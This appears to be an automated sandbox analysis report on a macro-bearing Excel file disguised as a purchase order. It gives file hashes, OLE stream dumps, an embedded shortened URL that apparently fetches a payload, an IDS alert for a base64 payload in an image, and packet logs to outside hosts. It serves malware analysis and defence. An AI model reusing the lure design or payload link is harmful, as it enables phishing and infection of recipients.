                                                  Preview:......................>...................................8...................z.......|.......~........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...............;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...{...

                                                  Static File Info

                                                  General

                                                  File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Wed Aug 14 08:47:17 2024, Security: 1
                                                  Entropy (8bit):7.945159130030238
                                                  TrID:
                                                  • Microsoft Excel sheet (30009/1) 47.99%
                                                  • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                                                  • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                                                  File name:Mac Purchase Order PO102935.xls
                                                  File size:455'680 bytes
                                                  MD5:e07cfed85c1ddf5a98b21de6cb894a18
                                                  SHA1:092241ff646b40b753d18973ec61638a0f70fa98
                                                  SHA256:5daccf2d036e313eacb7b0660c8f6c4b4eb48a7bf841f5f85a68eaf08b678553
                                                  SHA512:0016dc6031bc7f82b7d85ccd6d93e7618eb56d4ff5fb08847c73996a61c7a5670786bb689fec14e3ab704070e472ab8f16ed25bd5f428b0ac104e827e712cf68
                                                  SSDEEP:12288:aWkD+1iATCUvwG3Dl6M+ntycfS8ZxGxJygH42DYqI9:dkD+1BCSDinTrZxK4mYqG
                                                  TLSH:C1A4231271D3EF47D99B8831ADC0EADF25A9FD90AE46CA4731A5731E92387F2C831149
                                                  File Content Preview:........................>...................................8...................{.......}......................................................................................................................................................................

                                                  File Icon

                                                  Icon Hash:276ea3a6a6b7bfbf

                                                  Static OLE Info

                                                  General

                                                  Document Type:OLE
                                                  Number of OLE Files:1

                                                  OLE File "Mac Purchase Order PO102935.xls"

                                                  Indicators
                                                  Has Summary Info:
                                                  Application Name:Microsoft Excel
                                                  Encrypted Document:True
                                                  Contains Word Document Stream:False
                                                  Contains Workbook/Book Stream:True
                                                  Contains PowerPoint Document Stream:False
                                                  Contains Visio Document Stream:False
                                                  Contains ObjectPool Stream:False
                                                  Flash Objects Count:0
                                                  Contains VBA Macros:True
                                                  Summary
                                                  Code Page:1252
                                                  Author:
                                                  Last Saved By:
                                                  Create Time:2006-09-16 00:00:00
                                                  Last Saved Time:2024-08-14 07:47:17
                                                  Creating Application:Microsoft Excel
                                                  Security:1
                                                  Document Summary
                                                  Document Code Page:1252
                                                  Thumbnail Scaling Desired:False
                                                  Contains Dirty Links:False
                                                  Shared Document:False
                                                  Changed Hyperlinks:False
                                                  Application Version:786432

                                                  Streams with VBA

                                                  VBA File Name: Sheet1.cls, Stream Size: 977
                                                  General
                                                  Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
                                                  VBA File Name:Sheet1.cls
                                                  Stream Size:977
                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . " [ | . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 .
                                                  Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 1b 22 5b 7c 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                  VBA Code
                                                  Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                                                  VBA File Name: Sheet2.cls, Stream Size: 977
                                                  General
                                                  Stream Path:_VBA_PROJECT_CUR/VBA/Sheet2
                                                  VBA File Name:Sheet2.cls
                                                  Stream Size:977
                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . " . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
                                                  Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 1b 22 f8 90 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                  VBA Code
                                                  Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                                                  VBA File Name: Sheet3.cls, Stream Size: 977
                                                  General
                                                  Stream Path:_VBA_PROJECT_CUR/VBA/Sheet3
                                                  VBA File Name:Sheet3.cls
                                                  Stream Size:977
                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . " . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . -
                                                  Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 1b 22 0b 83 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                  VBA Code
                                                  Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                                                  VBA File Name: ThisWorkbook.cls, Stream Size: 985
                                                  General
                                                  Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
                                                  VBA File Name:ThisWorkbook.cls
                                                  Stream Size:985
                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . " 6 . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 1 . 9 . -
                                                  Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 1b 22 36 86 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                  VBA Code
                                                  Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                                                  Streams

                                                  Stream Path: \x1CompObj, File Type: data, Stream Size: 114
                                                  General
                                                  Stream Path:\x1CompObj
                                                  CLSID:
                                                  File Type:data
                                                  Stream Size:114
                                                  Entropy:4.25248375192737
                                                  Base64 Encoded:True
                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                                                  Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                  Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 244
                                                  General
                                                  Stream Path:\x5DocumentSummaryInformation
                                                  CLSID:
                                                  File Type:data
                                                  Stream Size:244
                                                  Entropy:2.889430592781307
                                                  Base64 Encoded:False
                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
                                                  Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a1 00 00 00 02 00 00 00 e4 04 00 00
                                                  Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 200
                                                  General
                                                  Stream Path:\x5SummaryInformation
                                                  CLSID:
                                                  File Type:data
                                                  Stream Size:200
                                                  Entropy:3.285842543212684
                                                  Base64 Encoded:False
                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . | . # . @ . . . ? / . . . . . . . . . .
                                                  Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 04 00 00 00
                                                  Stream Path: MBD003C2026/\x1CompObj, File Type: data, Stream Size: 99
                                                  General
                                                  Stream Path:MBD003C2026/\x1CompObj
                                                  CLSID:
                                                  File Type:data
                                                  Stream Size:99
                                                  Entropy:3.631242196770981
                                                  Base64 Encoded:False
                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . 9 q . . . . . . . . . . . .
                                                  Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                  Stream Path: MBD003C2026/Package, File Type: Microsoft Excel 2007+, Stream Size: 26744
                                                  General
                                                  Stream Path:MBD003C2026/Package
                                                  CLSID:
                                                  File Type:Microsoft Excel 2007+
                                                  Stream Size:26744
                                                  Entropy:7.76054332605621
                                                  Base64 Encoded:True
                                                  Data ASCII:P K . . . . . . . . . . ! . D . 2 . . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                  Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 44 19 a7 ee 32 01 00 00 c9 02 00 00 13 00 08 02 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 04 02 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                  Stream Path: MBD003C2027/\x1Ole, File Type: data, Stream Size: 390
                                                  General
                                                  Stream Path:MBD003C2027/\x1Ole
                                                  CLSID:
                                                  File Type:data
                                                  Stream Size:390
                                                  Entropy:6.122537460135232
                                                  Base64 Encoded:False
                                                  Data ASCII:. . . . Q y . < { . . . . . . . . . . . . . . . y . . . K . . . . h . t . t . p . s . : . / . / . j . i . o . u . r . l . . . c . o . m . / . G . m . w . g . T . s . . . T s r f y = / o . 1 * . z . . . p x Z c s . m h . % . 5 ; . . . . 8 . . 7 . . t . a . Z ^ . . . I . . ) . . ' f ' X I . A t q . . % k . @ . . > ) s . a . . . . 1 1 . K . . . . . . . . . . . . . . . . @ . . . z . i . E . U . h . N . A . P . m . w . 6 . y . s . m . o . D . L . u . A . f . L . k . S . b . W . n . L . 7 . J . 4 . 0 . . . .
                                                  Data Raw:01 00 00 02 f9 51 83 79 02 90 3c 7b 00 00 00 00 00 00 00 00 00 00 00 00 e6 00 00 00 e0 c9 ea 79 f9 ba ce 11 8c 82 00 aa 00 4b a9 0b e2 00 00 00 68 00 74 00 74 00 70 00 73 00 3a 00 2f 00 2f 00 6a 00 69 00 6f 00 75 00 72 00 6c 00 2e 00 63 00 6f 00 6d 00 2f 00 47 00 6d 00 77 00 67 00 54 00 73 00 00 00 54 ff 73 fb 72 d1 66 79 f9 3d b1 b1 2f 6f 0b 31 c1 a8 2a ba 00 7a 06 81 20 0c 1e 70
                                                  Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 411113
                                                  General
                                                  Stream Path:Workbook
                                                  CLSID:
                                                  File Type:Applesoft BASIC program data, first line number 16
                                                  Stream Size:411113
                                                  Entropy:7.999088159611733
                                                  Base64 Encoded:True
                                                  Data ASCII:. . . . . . . . . . . . . . . . . / . 6 . . . . . . . f . ? = y 0 ? g c b C C + \\ w . . M p < . ` . ^ . . . . . . . . . . . . \\ . p . m ? W / . . ) " ) S . P O . ! % 3 c f y . " N C . ( C . . Q a ? . 1 7 c . S . O I { m 1 . x . ! ^ ) } . F # x I o } . u % B . . . . . a . . . * ! . . . = . . . ~ m . . . . O ^ p h . c 5 u . o . . . s D . . . . . $ . . . . < . . . . d m . . . . . . . . . = . . . l 8 c . ! 9 } 2 A _ ! @ . . . W . . . " . . . ~ N . . . . R . . . F . . . ` . 1 . . . I . T . . y . . V . . . .
                                                  Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 2f 00 36 00 01 00 01 00 01 00 f9 66 18 3f 3d 79 bd 30 82 a1 3f 67 8b 63 f2 62 96 90 43 43 2b 5c 77 18 e1 11 4d 70 85 ff e2 d4 f0 a8 3c 1f f6 8b cc 60 1e 5e 01 cb ff c4 1d 95 e1 00 02 00 b0 04 c1 00 02 00 f9 da e2 00 00 00 5c 00 70 00 6d ae 3f 57 f7 2f 09 11 29 f6 a6 bd 99 22 29 86 20 8a cb 53 0f 50 d6 f8 4f e0 b5 89 21 b4
                                                  Stream Path: _VBA_PROJECT_CUR/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 519
                                                  General
                                                  Stream Path:_VBA_PROJECT_CUR/PROJECT
                                                  CLSID:
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Stream Size:519
                                                  Entropy:5.284982522646526
                                                  Base64 Encoded:True
                                                  Data ASCII:I D = " { 2 F 7 F 8 0 C F - B A 8 3 - 4 5 7 6 - 8 F 7 6 - 7 C 1 4 6 5 5 D 2 D 3 F } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 3 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " A 8 A A 5 B 9 9 5 F 9 9 5 F 9 9 5
                                                  Data Raw:49 44 3d 22 7b 32 46 37 46 38 30 43 46 2d 42 41 38 33 2d 34 35 37 36 2d 38 46 37 36 2d 37 43 31 34 36 35 35 44 32 44 33 46 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 32 2f 26 48 30 30 30
                                                  Stream Path: _VBA_PROJECT_CUR/PROJECTwm, File Type: data, Stream Size: 104
                                                  General
                                                  Stream Path:_VBA_PROJECT_CUR/PROJECTwm
                                                  CLSID:
                                                  File Type:data
                                                  Stream Size:104
                                                  Entropy:3.0488640812019017
                                                  Base64 Encoded:False
                                                  Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . S h e e t 3 . S . h . e . e . t . 3 . . . . .
                                                  Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 53 68 65 65 74 32 00 53 00 68 00 65 00 65 00 74 00 32 00 00 00 53 68 65 65 74 33 00 53 00 68 00 65 00 65 00 74 00 33 00 00 00 00 00
                                                  Stream Path: _VBA_PROJECT_CUR/VBA/_VBA_PROJECT, File Type: data, Stream Size: 2644
                                                  General
                                                  Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
                                                  CLSID:
                                                  File Type:data
                                                  Stream Size:2644
                                                  Entropy:3.9980896197861022
                                                  Base64 Encoded:False
                                                  Data ASCII:a . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o . r .
                                                  Data Raw:cc 61 88 00 00 01 00 ff 09 40 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00
                                                  Stream Path: _VBA_PROJECT_CUR/VBA/dir, File Type: data, Stream Size: 553
                                                  General
                                                  Stream Path:_VBA_PROJECT_CUR/VBA/dir
                                                  CLSID:
                                                  File Type:data
                                                  Stream Size:553
                                                  Entropy:6.3608798354089116
                                                  Base64 Encoded:True
                                                  Data ASCII:. % . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . V B A P r o j e c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . . W h . . . . J < . . . . . r s t d o l e > . . . s . t . d . o . l . e . . . h . % . ^ . . * \\ G { 0 0 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . E O f f D i c E O . f . i . c E . . E . 2 D F 8 D 0 4 C . - 5 B F A - 1 0 1 B - B D E 5 E A A C 4 . 2
                                                  Data Raw:01 25 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 7f 57 cd 68 08 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47

                                                  Network Behavior

                                                  Suricata IDS Alerts

                                                  TimestampProtocolSIDSignatureSeveritySource PortDest PortSource IPDest IP
                                                  2024-08-16T09:32:48.120716+0200TCP2049038ET MALWARE Malicious Base64 Encoded Payload In Image144349171207.241.232.154192.168.2.22

                                                  Network Port Distribution

                                                  TCP Packets

                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Aug 16, 2024 09:32:28.262872934 CEST49161443192.168.2.22188.114.97.3
                                                  Aug 16, 2024 09:32:28.262918949 CEST44349161188.114.97.3192.168.2.22
                                                  Aug 16, 2024 09:32:28.263138056 CEST49161443192.168.2.22188.114.97.3
                                                  Aug 16, 2024 09:32:28.268418074 CEST49161443192.168.2.22188.114.97.3
                                                  Aug 16, 2024 09:32:28.268508911 CEST44349161188.114.97.3192.168.2.22
                                                  Aug 16, 2024 09:32:28.735666990 CEST44349161188.114.97.3192.168.2.22
                                                  Aug 16, 2024 09:32:28.735816002 CEST49161443192.168.2.22188.114.97.3
                                                  Aug 16, 2024 09:32:28.740370989 CEST49161443192.168.2.22188.114.97.3
                                                  Aug 16, 2024 09:32:28.740405083 CEST44349161188.114.97.3192.168.2.22
                                                  Aug 16, 2024 09:32:28.740725040 CEST44349161188.114.97.3192.168.2.22
                                                  Aug 16, 2024 09:32:28.740781069 CEST49161443192.168.2.22188.114.97.3
                                                  Aug 16, 2024 09:32:28.804984093 CEST49161443192.168.2.22188.114.97.3
                                                  Aug 16, 2024 09:32:28.848546982 CEST44349161188.114.97.3192.168.2.22
                                                  Aug 16, 2024 09:32:29.104074955 CEST44349161188.114.97.3192.168.2.22
                                                  Aug 16, 2024 09:32:29.104139090 CEST44349161188.114.97.3192.168.2.22
                                                  Aug 16, 2024 09:32:29.104290009 CEST49161443192.168.2.22188.114.97.3
                                                  Aug 16, 2024 09:32:29.104290962 CEST49161443192.168.2.22188.114.97.3
                                                  Aug 16, 2024 09:32:29.112658024 CEST49161443192.168.2.22188.114.97.3
                                                  Aug 16, 2024 09:32:29.112719059 CEST44349161188.114.97.3192.168.2.22
                                                  Aug 16, 2024 09:32:29.129542112 CEST4916280192.168.2.22192.210.150.33
                                                  Aug 16, 2024 09:32:29.135082006 CEST8049162192.210.150.33192.168.2.22
                                                  Aug 16, 2024 09:32:29.135168076 CEST4916280192.168.2.22192.210.150.33
                                                  Aug 16, 2024 09:32:29.135225058 CEST4916280192.168.2.22192.210.150.33
                                                  Aug 16, 2024 09:32:29.140361071 CEST8049162192.210.150.33192.168.2.22
                                                  Aug 16, 2024 09:32:29.642558098 CEST8049162192.210.150.33192.168.2.22
                                                  Aug 16, 2024 09:32:29.642612934 CEST8049162192.210.150.33192.168.2.22
                                                  Aug 16, 2024 09:32:29.642649889 CEST8049162192.210.150.33192.168.2.22
                                                  Aug 16, 2024 09:32:29.642683983 CEST8049162192.210.150.33192.168.2.22
                                                  Aug 16, 2024 09:32:29.642704010 CEST4916280192.168.2.22192.210.150.33
                                                  Aug 16, 2024 09:32:29.642704010 CEST4916280192.168.2.22192.210.150.33
                                                  Aug 16, 2024 09:32:29.642725945 CEST8049162192.210.150.33192.168.2.22
                                                  Aug 16, 2024 09:32:29.642764091 CEST8049162192.210.150.33192.168.2.22
                                                  Aug 16, 2024 09:32:29.642766953 CEST4916280192.168.2.22192.210.150.33
                                                  Aug 16, 2024 09:32:29.642802954 CEST8049162192.210.150.33192.168.2.22
                                                  Aug 16, 2024 09:32:29.642805099 CEST4916280192.168.2.22192.210.150.33
                                                  Aug 16, 2024 09:32:29.642805099 CEST4916280192.168.2.22192.210.150.33
                                                  Aug 16, 2024 09:32:29.642846107 CEST4916280192.168.2.22192.210.150.33
                                                  Aug 16, 2024 09:32:29.643079042 CEST8049162192.210.150.33192.168.2.22
                                                  Aug 16, 2024 09:32:29.643115044 CEST8049162192.210.150.33192.168.2.22
                                                  Aug 16, 2024 09:32:29.643140078 CEST4916280192.168.2.22192.210.150.33
                                                  Aug 16, 2024 09:32:29.643151999 CEST8049162192.210.150.33192.168.2.22
                                                  Aug 16, 2024 09:32:29.643163919 CEST4916280192.168.2.22192.210.150.33
                                                  Aug 16, 2024 09:32:29.643218040 CEST4916280192.168.2.22192.210.150.33
                                                  Aug 16, 2024 09:32:29.647999048 CEST8049162192.210.150.33192.168.2.22
                                                  Aug 16, 2024 09:32:29.648049116 CEST8049162192.210.150.33192.168.2.22
                                                  Aug 16, 2024 09:32:29.648072958 CEST4916280192.168.2.22192.210.150.33
                                                  Aug 16, 2024 09:32:29.648103952 CEST4916280192.168.2.22192.210.150.33
                                                  Aug 16, 2024 09:32:29.649451971 CEST4916280192.168.2.22192.210.150.33
                                                  Aug 16, 2024 09:32:29.710236073 CEST8049162192.210.150.33192.168.2.22
                                                  Aug 16, 2024 09:32:29.710258007 CEST8049162192.210.150.33192.168.2.22
                                                  Aug 16, 2024 09:32:29.710285902 CEST8049162192.210.150.33192.168.2.22
                                                  Aug 16, 2024 09:32:29.710305929 CEST4916280192.168.2.22192.210.150.33
                                                  Aug 16, 2024 09:32:29.710314035 CEST8049162192.210.150.33192.168.2.22
                                                  Aug 16, 2024 09:32:29.710333109 CEST8049162192.210.150.33192.168.2.22
                                                  Aug 16, 2024 09:32:29.710334063 CEST4916280192.168.2.22192.210.150.33
                                                  Aug 16, 2024 09:32:29.710350990 CEST8049162192.210.150.33192.168.2.22
                                                  Aug 16, 2024 09:32:29.710376978 CEST8049162192.210.150.33192.168.2.22
                                                  Aug 16, 2024 09:32:29.710385084 CEST4916280192.168.2.22192.210.150.33
